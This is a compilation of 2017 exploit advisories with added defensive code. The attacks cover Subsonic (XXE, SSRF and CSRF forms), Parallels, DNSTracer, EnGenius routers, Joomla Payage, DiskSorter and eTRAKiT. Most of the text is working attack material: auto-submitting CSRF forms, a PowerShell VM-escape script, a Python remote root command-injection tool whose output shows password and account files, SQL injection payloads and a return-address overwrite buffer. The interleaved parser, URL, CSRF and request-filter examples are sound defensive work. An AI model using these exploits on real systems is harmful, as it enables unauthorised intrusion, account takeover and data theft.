%mmmm;]>
2) Import as playlist.
3) Start listener.
nc.exe -llvp 1337
listening on [any] 1337 ...
connect to [127.0.0.1] from USER-PC [127.0.0.1] 64428
GET / HTTP/1.1
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Java/1.8.0_45
Host: 127.0.0.1:1337
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
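The import path needs an XML parser that refuses DTDs outright rather than one that hopes external entity resolution is off. What follows is an added example (not Subsonic's code) of an XSPF reader built on Python's expat bindings: it aborts on any DOCTYPE or entity declaration before the parser can reach an external reference, and otherwise returns the track locations. The benign playlist is constructed; the malicious one is the playlist from the page above.

```python
import xml.parsers.expat

# Constructed benign XSPF playlist.
BENIGN_XSPF = b"""<?xml version="1.0" encoding="UTF-8"?>
<playlist version="1" xmlns="http://xspf.org/ns/0/">
  <trackList>
    <track><location>file:///music/one.mp3</location><title>One</title></track>
    <track><location>file:///music/two.flac</location></track>
  </trackList>
</playlist>
"""

# The playlist from the advisory: a parameter entity pointing at a listener.
MALICIOUS_XSPF = b"""<?xml version="1.0"?>
<!DOCTYPE mmmmmRaisins [
<!ENTITY % mmmm SYSTEM "http://127.0.0.1:1337/">
%mmmm;]>
"""


class UnsafePlaylist(ValueError):
    """Raised when a playlist carries a DTD or an entity declaration."""


def parse_playlist(data):
    """Parse an XSPF document and return its <location> values.

    Any <!DOCTYPE> or <!ENTITY> declaration aborts parsing immediately, so the
    parser never reaches a point where an external entity could be fetched.
    """
    parser = xml.parsers.expat.ParserCreate()
    # expat expands parameter entities only when told to; say "never" explicitly.
    parser.SetParamEntityParsing(xml.parsers.expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafePlaylist("DOCTYPE %r not allowed (system id %r)" % (name, sysid))

    def on_entity(name, is_param, value, base, sysid, pubid, notation):
        raise UnsafePlaylist("entity %r not allowed (system id %r)" % (name, sysid))

    locations, stack, text = [], [], []

    def on_start(tag, attrs):
        stack.append(tag)
        text.clear()

    def on_chars(chunk):          # expat may split one text node into several calls
        text.append(chunk)

    def on_end(tag):
        if tag == "location" and "track" in stack:
            locations.append("".join(text).strip())
        stack.pop()
        text.clear()

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.StartElementHandler = on_start
    parser.EndElementHandler = on_end
    parser.CharacterDataHandler = on_chars
    parser.Parse(data, True)
    return locations


def is_playlist_safe(data):
    """True when the document parses without any DTD; malformed XML also counts as unsafe to import."""
    try:
        parse_playlist(data)
        return True
    except (UnsafePlaylist, xml.parsers.expat.ExpatError):
        return False


if __name__ == "__main__":
    print(parse_playlist(BENIGN_XSPF))
    print("malicious playlist accepted:", is_playlist_safe(MALICIOUS_XSPF))
```

Raising from inside an expat handler stops the parse and propagates the exception out of `Parse`, which is what makes the reject-on-DOCTYPE approach reliable: the decision is made on the declaration itself, not on whether a particular resolver feature happens to be disabled. Because the malicious sample is rejected at the DOCTYPE, the `%mmmm;` reference that would trigger the outbound request is never evaluated.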
Network Access:
===============
Remote
Severity:
=========
High
Disclosure Timeline:
==================================
Vendor Notification: May 29, 2017
Vendor Acknowledgement: May 30, 2017
June 4, 2017 : Public Disclosure
hyp3rlinx
[+] Credits: John Page a.k.a hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/SUBSONIC-CSRF-SERVER-SIDE-REQUEST-FORGERY.txt
[+] ISR: ApparitionSec
Vendor:
================
www.subsonic.org
Product:
===============
subsonic v6.1.1
Subsonic is a media streaming server. You install it on your own computer where you keep your music or video collection.
Vulnerability Type:
==================================
CSRF - Server Side Request Forgery
CVE Reference:
==============
CVE-2017-9413
Security Issue:
================
Remote attackers can abuse the Podcast feature of subsonic to launch Server Side Request Forgery attacks on the internal network
or to the internet if an authenticated user clicks a malicious link or visits an attacker controlled webpage. SSRF can be used to
bypass Firewall restriction on LAN.
e.g
nc.exe -llvp 1337
listening on [any] 1337 ...
connect to [127.0.0.1] from USER-PC [127.0.0.1] 64428
GET / HTTP/1.1
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Java/1.8.0_45
Host: 127.0.0.1:1337
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
Exploit/POC:
=============
nc.exe -llvp 1337
listening on [any] 1337 ...
1) Subscribe to Podcast CSRF Persistent SSRF
<form method="post" action="http://localhost:4040/podcastReceiverAdmin.view?">
<input type="text" name="add" value="http://127.0.0.1:1337">
<input type="submit" value="OK">
<script>document.forms[0].submit()</script>
</form>
nc.exe -llvp 5555
listening on [any] 5555 ...
2) Internet Radio Settings CSRF Persistent SSRF
<form action="http://localhost:4040/networkSettings.view" method="post">
<input name="portForwardingEnabled" type="hidden" value="true"/>
<input type="hidden" name="_portForwardingEnabled" value="on"/>
<input name="urlRedirectionEnabled" type="hidden" value="true" />
<input type="hidden" name="_urlRedirectionEnabled" value="on"/>
<input name="urlRedirectType" type="radio" value="NORMAL"/>
<input name="urlRedirectFrom" type="radio" value="yourname"/>
<input name="urlRedirectType" type="radio" value="CUSTOM" checked="true" />
<input name="urlRedirectCustomUrl" type="hidden" value="http://127.0.0.1:5555"/>
<script>document.forms[0].submit()</script>
</form>
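Both forms above succeed because the server later fetches whatever URL it was handed, whether as a podcast feed or as a redirection target. As an added example (not Subsonic's code), here is a URL check for such server-fetched values: only http(s), no embedded credentials, and every address the host resolves to must be a public one. The resolver is injectable so the check can be exercised offline; the host names used in the demonstration are constructed.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = ("http", "https")


def system_resolver(host):
    """Resolve host to all of its addresses with the OS resolver."""
    return sorted({ai[4][0] for ai in socket.getaddrinfo(host, None)})


def is_public_address(ip):
    """True only for addresses routable on the public internet."""
    return not (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def is_safe_feed_url(url, resolver=system_resolver):
    """Return (ok, reason). ok is True only when url is http(s), carries no
    credentials, and every address its host resolves to is public."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, "scheme %r not allowed" % parts.scheme
    if parts.username or parts.password:
        return False, "credentials embedded in URL"
    host = parts.hostname
    if not host:
        return False, "missing host"
    try:
        addresses = [ipaddress.ip_address(host)]        # literal IPv4/IPv6, no lookup needed
    except ValueError:
        try:
            addresses = [ipaddress.ip_address(a) for a in resolver(host)]
        except OSError:                                  # socket.gaierror is an OSError
            return False, "host does not resolve"
    if not addresses:
        return False, "host does not resolve"
    for ip in addresses:
        if not is_public_address(ip):
            return False, "host resolves to non-public address %s" % ip
    return True, "ok"


# Constructed name-to-address table so the demonstration runs without DNS.
FAKE_DNS = {
    "podcast.example": ["93.184.216.34"],
    "intranet.example": ["10.0.0.5"],
    "meta.example": ["169.254.169.254"],
}


def fake_resolver(host):
    return FAKE_DNS[host]


if __name__ == "__main__":
    for u in ("http://podcast.example/feed.xml", "http://127.0.0.1:1337",
              "http://intranet.example/", "http://[::1]:5555/", "file:///etc/passwd"):
        print(u, "->", is_safe_feed_url(u, fake_resolver))
```

A check at submit time is necessary but not sufficient: the name can be re-pointed at an internal address between validation and fetch (DNS rebinding), and an HTTP redirect can lead to one. The fetcher should therefore connect to the address that was validated and re-run the check on every redirect target, and the CSRF token of the companion example applies to these forms as well.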
Network Access:
===============
Remote
Severity:
=========
High
Disclosure Timeline:
==================================
Vendor Notification: May 29, 2017
Vendor Acknowledgement: May 30, 2017
June 4, 2017 : Public Disclosure
hyp3rlinx
[+] Credits: John Page a.k.a hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/SUBSONIC-PASSWORD-RESET-CSRF.txt
[+] ISR: ApparitionSec
Vendor:
================
www.subsonic.org
Product:
===============
subsonic v6.1.1
Subsonic is a media streaming server. You install it on your own computer where you keep your music or video collection.
Vulnerability Type:
=====================
CSRF - Password Reset
CVE Reference:
==============
CVE-2017-9415
Security Issue:
================
Remote attackers can reset subsonic user account passwords if an authenticated user clicks a malicious link
or visits an attacker controlled webpage. However, the username must be known or guessed.
Exploit/POC:
=============
<form action="http://localhost:4040/userSettings.view" method="POST">
<input type="hidden" name="username" value="admin">
<input type="hidden" name="transcodeSchemeName" value="OFF">
<input name="passwordChange" type="hidden" value="true"/>
<input type="hidden" name="_passwordChange" value="on"/>
<input name="password" type="hidden" value="xyz123"/>
<input name="confirmPassword" type="hidden" value="xyz123"/>
<input name="email" type="hidden" value=""/>
<script>document.forms[0].submit()</script>
</form>
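The form in this advisory and the one in the CSRF / persistent XSS advisory above both work because the server accepts any POST that arrives with the victim's session cookie, and in the XSS case also renders the submitted player name unescaped. An added example (not Subsonic's code) of the two server-side controls that close both: a per-session token compared in constant time, with an Origin/Referer comparison as defence in depth, and HTML-escaping of the stored name when it is rendered. Session and headers are plain dicts here, an assumption made to keep the example framework-free.

```python
import hmac
import html
import secrets
from urllib.parse import urlsplit

# Assumption: the application's own origin, taken from the URLs in the advisories.
OWN_ORIGIN = "http://localhost:4040"


def issue_csrf_token(session):
    """Create a fresh random token, store it in the session and return it so the
    server can embed it as a hidden field in its own forms."""
    token = secrets.token_hex(32)
    session["csrf_token"] = token
    return token


def _same_origin(url, own):
    a, b = urlsplit(url), urlsplit(own)
    return (a.scheme, a.hostname, a.port) == (b.scheme, b.hostname, b.port)


def csrf_check(session, form, headers, own_origin=OWN_ORIGIN):
    """Return (ok, reason) for a state-changing POST.

    The token is the primary control: a page on another origin cannot read it,
    so the auto-submitted forms above cannot include it. The Origin/Referer
    comparison adds a second, independent signal when a browser sends one.
    """
    expected = session.get("csrf_token", "")
    supplied = form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return False, "missing or mismatched CSRF token"
    source = headers.get("Origin") or headers.get("Referer")
    if source and not _same_origin(source, own_origin):
        return False, "cross-origin request from %s" % source
    return True, "ok"


def render_player_name(name):
    """Escape on output so a stored name containing <script> is displayed as text."""
    return '<span class="player">%s</span>' % html.escape(name, quote=True)


if __name__ == "__main__":
    session = {}
    token = issue_csrf_token(session)
    # What the attacker's page submits: the victim's cookie rides along, the token cannot.
    forged = {"playerId": "1", "name": "<script>alert('XSS ' + document.cookie)</script>"}
    print("forged post:", csrf_check(session, forged, {"Origin": "http://attacker.example"}))
    legitimate = {"csrf_token": token, "playerId": "1", "name": "Kitchen"}
    print("own form:   ", csrf_check(session, legitimate, {"Origin": OWN_ORIGIN}))
    print(render_player_name(forged["name"]))
```

Marking the session cookie `SameSite=Lax` (or `Strict`) gives a third, browser-side layer, since the attack depends on the cookie being attached to a cross-site POST; it complements rather than replaces the token, because older clients do not honour the attribute. The password-reset form needs the same token check, plus the current password for any change of credentials.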
Network Access:
===============
Remote
Severity:
=========
High
Disclosure Timeline:
=============================
Vendor Notification: May 29, 2017
Vendor Acknowledgement: May 30, 2017
June 4, 2017 : Public Disclosure
hyp3rlinx
#[+] Title: Parallels Desktop - Virtual Machine Escape
#[+] Product: Parallels
#[+] Vendor: http://www.parallels.com/products/desktop/
#[+] Affected Versions: All Versions
#
#
# Author : Mohammad Reza Espargham
# Linkedin : https://ir.linkedin.com/in/rezasp
# E-Mail : me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
# Website : www.reza.es
# Twitter : https://twitter.com/rezesp
# FaceBook : https://www.facebook.com/reza.espargham
# Github : github.com/rezasp
# youtube : https://youtu.be/_nZ4y0ZTrwA
#
#
#There is a security issue in the shared folder implementation in Parallels Desktop
#DLL : PrlToolsShellExt.dll 10.2.0 (28956)
#prl_tg Driver
#Very simple exploit with powershell
#powershell.exe poc.ps1
#Write OSX Executable file in temp
[io.file]::WriteAllText($env:temp + '\r3z4.command',"Say 'You are hacked by 1337'")
add-type -AssemblyName microsoft.VisualBasic
add-type -AssemblyName System.Windows.Forms
#open temp in explorer
explorer $env:temp
#wait for 500 milliseconds
start-sleep -Milliseconds 500
#select Temp active window
[Microsoft.VisualBasic.Interaction]::AppActivate("Temp")
#find r3z4.command file
[System.Windows.Forms.SendKeys]::SendWait("r3z4")
#right click
[System.Windows.Forms.SendKeys]::SendWait("+({F10})")
#goto "Open on Mac" in menu
[System.Windows.Forms.SendKeys]::SendWait("{DOWN}")
[System.Windows.Forms.SendKeys]::SendWait("{DOWN}")
[System.Windows.Forms.SendKeys]::SendWait("{DOWN}")
#Click Enter
[System.Windows.Forms.SendKeys]::SendWait("~")
#Enjoy ;)
################
#Exploit Title: DNSTracer Stack-based Buffer Overflow
#CVE: CVE-2017-9430
#CWE: CWE-119
#Exploit Author: Hosein Askari (FarazPajohan)
#Vendor HomePage: http://www.mavetju.org
#Version : 1.8.1
#Tested on: Parrot OS
#Date: 04-06-2017
#Category: Application
#Author Mail : hosein.askari@aol.com
#Description: Stack-based buffer overflow in dnstracer through 1.9 allows attackers to cause a denial of service (application crash) or possibly have unspecified other impact via a command line with a long name argument that is mishandled in a strcpy call for argv[0]. An example threat model is a web application that launches dnstracer with an untrusted name string.
###############################
#dnstracer -v $(python -c 'print "A"*1025')
*** buffer overflow detected ***: dnstracer terminated
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(+0x70bcb)[0x7ff6e79edbcb]
/lib/x86_64-linux-gnu/libc.so.6(__fortify_fail+0x37)[0x7ff6e7a76037]
/lib/x86_64-linux-gnu/libc.so.6(+0xf7170)[0x7ff6e7a74170]
/lib/x86_64-linux-gnu/libc.so.6(+0xf64d2)[0x7ff6e7a734d2]
dnstracer(+0x2c8f)[0x5634368aac8f]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf1)[0x7ff6e799d2b1]
dnstracer(+0x2fca)[0x5634368aafca]
======= Memory map: ========
Aborted
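A triage helper for this kind of FORTIFY_SOURCE abort, as an added example that is not part of the advisory: it parses the banner and the Backtrace frames that dnstracer prints here (the reiserfstune advisory further down prints the same format), and reports which checked libc wrapper fired and the innermost frame outside glibc, which is the caller of the unbounded copy. The embedded sample outputs are this page's own, with the quoted-printable line wrapping of the dnstracer one undone and each cut after the memory-map header.

```python
"""Triage for glibc FORTIFY_SOURCE aborts ('*** buffer overflow detected ***').

Added example, not part of any advisory on this page; the two sample outputs
are the page's own, cut after the memory-map header.
"""
import re
from typing import List, NamedTuple, Optional

BANNER_RE = re.compile(r"\*\*\* (?P<kind>.+?) detected \*\*\*: (?P<program>\S+) terminated")
# One frame per line: module(symbol+0xoffset)[0xaddress]. A stripped binary
# prints no symbol, only the offset inside the module.
FRAME_RE = re.compile(
    r"^(?P<module>\S+?)"
    r"(?:\((?P<symbol>[^+)]*)(?:\+(?P<offset>0x[0-9a-fA-F]+))?\))?"
    r"\[(?P<addr>0x[0-9a-fA-F]+)\]$"
)
GLIBC_PREFIXES = ("libc.so", "libc-", "libpthread", "ld-")


class Frame(NamedTuple):
    module: str
    symbol: str            # "" when not symbolised
    offset: Optional[int]  # offset inside the module, when printed
    address: int

    @property
    def basename(self) -> str:
        return self.module.rsplit("/", 1)[-1]

    @property
    def in_glibc(self) -> bool:
        return self.basename.startswith(GLIBC_PREFIXES)


class Triage(NamedTuple):
    program: str
    kind: str
    frames: List[Frame]          # innermost first, as printed
    checked_call: Optional[str]  # the *_chk wrapper that caught it, if symbolised
    origin: Optional[Frame]      # innermost frame outside glibc: the caller to inspect


def parse_frames(lines: List[str]) -> List[Frame]:
    frames = []
    for line in lines:
        m = FRAME_RE.match(line.strip())
        if m:
            offset = int(m.group("offset"), 16) if m.group("offset") else None
            frames.append(Frame(m.group("module"), m.group("symbol") or "",
                                offset, int(m.group("addr"), 16)))
    return frames


def triage(output: str) -> Triage:
    """Parse one abort transcript; frames between 'Backtrace:' and 'Memory map:'."""
    banner = BANNER_RE.search(output)
    if banner is None:
        raise ValueError("no FORTIFY abort banner in output")
    lines = output.splitlines()
    start = next((i + 1 for i, line in enumerate(lines) if "Backtrace:" in line), len(lines))
    end = next((i for i, line in enumerate(lines) if "Memory map:" in line), len(lines))
    frames = parse_frames(lines[start:end])
    checked = next((f.symbol for f in frames if f.symbol.endswith("_chk")), None)
    origin = next((f for f in frames if not f.in_glibc), None)
    return Triage(banner.group("program"), banner.group("kind"), frames, checked, origin)


# The page's dnstracer output (quoted-printable wrapping undone).
DNSTRACER_OUTPUT = """\
*** buffer overflow detected ***: dnstracer terminated
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(+0x70bcb)[0x7ff6e79edbcb]
/lib/x86_64-linux-gnu/libc.so.6(__fortify_fail+0x37)[0x7ff6e7a76037]
/lib/x86_64-linux-gnu/libc.so.6(+0xf7170)[0x7ff6e7a74170]
/lib/x86_64-linux-gnu/libc.so.6(+0xf64d2)[0x7ff6e7a734d2]
dnstracer(+0x2c8f)[0x5634368aac8f]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf1)[0x7ff6e799d2b1]
dnstracer(+0x2fca)[0x5634368aafca]
======= Memory map: ========
Aborted
"""

# The page's reiserfstune output, where libc's __vsprintf_chk is symbolised.
REISERFSTUNE_OUTPUT = """\
*** buffer overflow detected ***: /sbin/reiserfstune terminated
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(+0x70bcb)[0x7f00ba498bcb]
/lib/x86_64-linux-gnu/libc.so.6(__fortify_fail+0x37)[0x7f00ba521037]
/lib/x86_64-linux-gnu/libc.so.6(+0xf7170)[0x7f00ba51f170]
/lib/x86_64-linux-gnu/libc.so.6(+0xf6729)[0x7f00ba51e729]
/lib/x86_64-linux-gnu/libc.so.6(_IO_default_xsputn+0xac)[0x7f00ba49cbdc]
/lib/x86_64-linux-gnu/libc.so.6(_IO_vfprintf+0x1ebb)[0x7f00ba470bbb]
/lib/x86_64-linux-gnu/libc.so.6(__vsprintf_chk+0x8c)[0x7f00ba51e7bc]
/usr/lib/x86_64-linux-gnu/libreiserfscore.so.0(die+0xad)[0x7f00babebbfd]
/sbin/reiserfstune(+0x2f07)[0x561ea5aa7f07]
/sbin/reiserfstune(+0x1d9c)[0x561ea5aa6d9c]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf1)[0x7f00ba4482b1]
/sbin/reiserfstune(+0x2b2a)[0x561ea5aa7b2a]
======= Memory map: ========
"""
```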
#!/usr/bin/env python
# coding: utf8
#
#
# EnGenius EnShare IoT Gigabit Cloud Service 1.4.11 Root Remote Code Execution
#
#
# Vendor: EnGenius Technologies Inc.
# Product web page: https://www.engeniustech.com
# Affected version: ESR300 (1.4.9, 1.4.7, 1.4.2, 1.4.1.28, 1.4.0, 1.3.1.42, 1.1.0.28)
# ESR350 (1.4.11, 1.4.9, 1.4.5, 1.4.2, 1.4.0, 1.3.1.41, 1.1.0.29)
# ESR600 (1.4.11, 1.4.9, 1.4.5, 1.4.3, 1.4.2, 1.4.1, 1.4.0.23, 1.3.1.63, 1.2.1.46, 1.1.0.50)
# EPG5000 (1.3.9.21, 1.3.7.20, 1.3.3.17, 1.3.3, 1.3.2, 1.3.0, 1.2.0)
# ESR900 (1.4.5, 1.4.3, 1.4.0, 1.3.5.18 build-12032015@liwei (5668b74), 1.3.1.26, 1.3.0, 1.2.2.23, 1.1.0)
# ESR1200 (1.4.5, 1.4.3, 1.4.1, 1.3.1.34, 1.1.0)
# ESR1750 (1.4.5, 1.4.3, 1.4.1, 1.4.0, 1.3.1.34, 1.3.0, 1.2.2.27, 1.1.0)
#
# Summary: With the EnGenius IoT Gigabit Routers and free EnShare app, use
# your iPhone, iPad or Android-based tablet or smartphone to transfer
# video, music and other files to and from a router-attached USB hard
# drive. Enshare is a USB media storage sharing application that enables
# access to files remotely. The EnShare feature allows you to access media
# content stored on a USB hard drive connected to the router's USB port in
# the home and when you are away from home when you have access to the Internet.
# By default the EnShare feature is enabled.
#
# EnShareTM supports both FAT32 and NTFS USB formats. Transfer speeds of data
# from your router-attached USB storage device to a remote/mobile device may
# vary based on Internet uplink and downlink speeds. The router's design enables
# users to connect numerous wired and wireless devices to it and supports intensive
# applications like streaming HD video and sharing of media in the home and accessing
# media away from the home with EnShare - Your Personal Media Cloud.
#
# Desc: EnGenius EnShare suffers from an unauthenticated command injection
# vulnerability. An attacker can inject and execute arbitrary code as the
# root user via the 'path' GET/POST parameter parsed by 'usbinteract.cgi'
# script.
#
# =======================================================================
#
# bash-4.4$ python enshare.py 10.0.0.17
# [+] Command: ls -alsh
# 44 -rwxr-xr-x 1 0 0 42.5K Oct 31 2014 getsize.cgi
# 4 -rwxr-xr-x 1 0 0 606 Oct 31 2014 languageinfo.cgi
# 48 -rwxr-xr-x 1 0 0 44.2K Oct 31 2014 upload.cgi
# 48 -rwxr-xr-x 1 0 0 44.5K Oct 31 2014 usbinfo.cgi
# 56 -rwxr-xr-x 1 0 0 54.1K Oct 31 2014 usbinteract.cgi
# 0 drwxr-xr-x 4 0 0 0 Jun 3 00:52 ..
# 0 drwxr-xr-x 2 0 0 0 Oct 31 2014 .
#
# [+] Command: id
# uid=0(root) gid=0(root)
#
# [+] Command: cat /etc/passwd
#
# Connecting to 10.0.0.17 port 9000
#
# HTTP/1.1 200 OK
# root: !:0:0:root:/root:/bin/sh
# administrator: *:65534:65534:administrator:/var:/bin/false
# admin: *:60000:60000:webaccount:/home:/usr/bin/sh
# guest: *:60001:60000:webaccount:/home:/usr/bin/sh
# Content-type: text/html
# Transfer-Encoding: chunked
# Date: Sat, 03 Jun 2017 13:48:14 GMT
# Server: lighttpd/1.4.31
#
# 0
# [+] Command: pwd
# /www/web/cgi-bin
# [+] Command: cat /etc/account.conf
#
# HTTP/1.1 200 OK
# 1: admin:admin:4
# 1: guest:guest:1
# Content-type: text/html
# Transfer-Encoding: chunked
# Date: Sat, 03 Jun 2017 14:53:42 GMT
# Server: lighttpd/1.4.31
# bash-4.4$
#
# =======================================================================
#
# Tested on: Linux 2.6.36 (mips)
# Embedded HTTP Server, Firmware Version 5.11
# lighttpd/1.4.31
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2017-5413
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5413.php
#
#
# 17.05.2017
#
# Python 3 port of the original Python 2 script: print(), input() and bytes on the socket.
import sys
import socket

if len(sys.argv) < 2:
    print('Usage: enshare.py <ip> [port]\n')
    sys.exit(1)
ip = sys.argv[1]
port = 9000 if len(sys.argv) < 3 else int(sys.argv[2])
cmd = input('[+] Command: ')
# Raw HTTP POST to the vulnerable CGI; the 'path' value is the injected part.
payload = 'POST /web/cgi-bin/usbinteract.cgi HTTP/1.1\r\n'
payload += 'Host: {0}:{1}\r\n'
payload += 'Content-Length: {2}\r\n'
payload += 'Content-Type: application/x-www-form-urlencoded\r\n\r\n'
payload += 'action=7&path=\"|{3}||\"'
# 19 = len('action=7&path="|') + len('||"'), the fixed part of the body
msg = payload.format(ip, port, len(cmd) + 19, cmd)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
target = (ip, port)
print('\nConnecting to %s port %s\n' % target, file=sys.stderr)
s.connect(target)
s.sendall(msg.encode())  # sockets take bytes in Python 3
response = s.recv(5000)
s.close()
print(response.decode(errors='replace').strip())
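What a check in front of usbinteract.cgi has to do, as an added example that is not the vendor's code and not part of the exploit above: parse the POST exactly as the script sends it, refuse any path value containing a shell metacharacter, and accept only a plain absolute path under the USB mount. The parameter names are the advisory's; the mount prefix, the verdict labels and the sample requests are assumptions.

```python
"""Request check for the 'path' parameter of usbinteract.cgi (ZSL-2017-5413).

Added example; not the vendor's code and not part of the exploit above. The
parameter names are the advisory's; USB_MOUNT_PREFIX, the verdict labels and
the sample requests are constructed.
"""
import re
from typing import Dict, List, Tuple
from urllib.parse import parse_qs

# Any of these lets a value break out of a quoted shell argument or chain
# commands; the PoC relies on '"' and '|' ("|cmd||").
SHELL_META = set('|&;`$(){}<>"\'\\\n\r')
USB_MOUNT_PREFIX = "/mnt/usb"  # assumed mount point of the router's USB storage
SAFE_SEGMENT = re.compile(r"[A-Za-z0-9._ -]+")


def parse_post(raw: bytes) -> Tuple[str, str, Dict[str, str]]:
    """Split a raw HTTP request into (method, target, first value of each form field)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line = head.split(b"\r\n", 1)[0].decode("latin-1")
    method, target, _version = request_line.split(" ", 2)
    fields = parse_qs(body.decode("latin-1"), keep_blank_values=True)
    return method, target, {k: v[0] for k, v in fields.items()}


def shell_metachars(value: str) -> List[str]:
    """Sorted list of shell metacharacters present in value (empty if none)."""
    return sorted({c for c in value if c in SHELL_META})


def is_plain_usb_path(value: str) -> bool:
    """True only for an absolute path under the mount with plain segments and no '.' or '..'."""
    if not value.startswith(USB_MOUNT_PREFIX + "/"):
        return False
    rest = value[len(USB_MOUNT_PREFIX) + 1:]
    return all(SAFE_SEGMENT.fullmatch(s) and s not in (".", "..") for s in rest.split("/"))


def classify(raw: bytes) -> Dict[str, object]:
    """Verdict for one request: 'ignored' (other CGI), 'injection', 'reject' or 'allow'."""
    method, target, fields = parse_post(raw)
    path = fields.get("path", "")
    result: Dict[str, object] = {"method": method, "target": target,
                                 "action": fields.get("action"), "path": path,
                                 "metachars": []}
    if not target.endswith("/usbinteract.cgi"):
        result["verdict"] = "ignored"
        return result
    meta = shell_metachars(path)
    result["metachars"] = meta
    if meta:
        result["verdict"] = "injection"   # would reach the shell; log and drop
    elif is_plain_usb_path(path):
        result["verdict"] = "allow"
    else:
        result["verdict"] = "reject"      # e.g. traversal out of the mount
    return result


# --- constructed sample requests, framed the way the PoC script frames them --
def _request(body: str) -> bytes:
    return ("POST /web/cgi-bin/usbinteract.cgi HTTP/1.1\r\n"
            "Host: 10.0.0.17:9000\r\n"
            "Content-Length: %d\r\n"
            "Content-Type: application/x-www-form-urlencoded\r\n\r\n%s"
            % (len(body), body)).encode("latin-1")


INJECTION_REQUEST = _request('action=7&path="|ls -alsh||"')  # the PoC's body for 'ls -alsh'
BENIGN_REQUEST = _request("action=7&path=/mnt/usb/music")
TRAVERSAL_REQUEST = _request("action=7&path=/mnt/usb/../../etc")

if __name__ == "__main__":
    for req in (INJECTION_REQUEST, BENIGN_REQUEST, TRAVERSAL_REQUEST):
        print(classify(req))
```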
# Exploit Title: Joomla Payage 2.05 - SQL Injection
# Exploit Author: Persian Hack Team
# Discovered by : Mojtaba MobhaM (Mojtaba Kazemi)
# Vendor Home : https://extensions.joomla.org/extensions/extension/e-commerce/payment-systems/payage/
# My Home : http://persian-team.ir/
# Google Dork : inurl:index.php?option=com_payage
# Telegram Channel: @PersianHackTeam
# Tested on: Linux
# Date: 2017-06-03
# POC :
# SQL Injection :
Parameter: aid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: option=com_payage&task=make_payment&aid=1001' AND 6552=6552 AND 'dCgx'='dCgx&tid=c4333ccdc8b2dced3f6e72511cd8a76f&tokenid=
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: option=com_payage&task=make_payment&aid=1001' AND (SELECT * FROM (SELECT(SLEEP(5)))JBKV) AND 'XFWL'='XFWL&tid=c4333ccdc8b2dced3f6e72511cd8a76f&tokenid=
---
http://server/index.php?option=com_payage&task=make_payment&aid=[SQL]&tid=c4333ccdc8b2dced3f6e72511cd8a76f&tokenid=
# Greetz : T3NZOG4N & FireKernel
# Iranian White Hat Hackers
#!/usr/bin/python
######################################
# Exploit Title: DiskSorter v9.7.14 - Input Directory Local Buffer Overflow - PoC
# Date: 25 May 2017
# Exploit Author: n3ckD_
# Vendor Homepage: http://www.disksorter.com/
# Software Link: http://www.disksorter.com/setups/disksorter_setup_v9.7.14.exe
# Version: Disk Sorter v9.7.14 (32-Bit)
# Tested on: Windows 7 Enterprise SP1 (Build 7601)
# Usage: Run the exploit, copy the text of the poc.txt into the 'Inputs -> Add Input Directory' dialog
######################################
# Python 3 port of the original Python 2 PoC (print statements only).
print("DiskSorter v9.7.14 (32-Bit) - Input Directory Local Buffer Overflow - PoC")
print("Copy the text of poc.txt into the 'Inputs -> Add Input Directory' dialog")
# in libspg:.text
# 10147C1C 58 POP EAX
# 10147C1D C3 RETN
ret = "\x1c\x7c\x14\x10"      # 0x10147C1C, little-endian: overwrites the saved return address
nops = "\x47\x4F" * 24        # printable filler bytes ('G', 'O') ahead of the padding
buf = nops + "A" * 4048 + ret + "MAGIC" + "\n"
# Text mode is fine here: every byte above is below 0x80 and is written unchanged.
with open("poc.txt", "w") as f:
    f.write(buf)
Software: Sungard eTRAKiT3
Version: 3.2.1.17 and possibly lower
CVE: CVE-2016-6566 (https://www.kb.cert.org/vuls/id/846103)
Vulnerable Component: Login page
Description
================
The login form is vulnerable to blind SQL injection by an unauthenticated user.
Vulnerabilities
================
The "valueAsString" parameter inside the JSON payload contained by the "ucLogin_txtLoginId_ClientStat" POST parameter is not properly validated. An unauthenticated remote attacker may modify the POST request and insert a SQL query which will then be executed by the backend server. eTRAKiT 3.2.1.17 was tested, but other versions may also be vulnerable.
Proof of concept
================
Steps to Reproduce:
1. Configure browser to use burp suite as proxy
2. Turn interceptor on in burp suite
3. Attempt to log in to etrakit3 website
4. Modify the resulting HTTP request in the following way
5. Locate the JSON payload contained by the ucLogin_txtLoginId_ClientStat POST parameter
6. Locate the valueAsString parameter inside the JSON payload
7. Append SQL code to the end of the value held by the valueAsString parameter, example: {"enabled":true,"emptyMessage":"Username","validationText":"fakeuser","valueAsString":"fakeuser';waitfor delay'0:0:10'--","lastSetTextBoxValue":"fakeuser"}
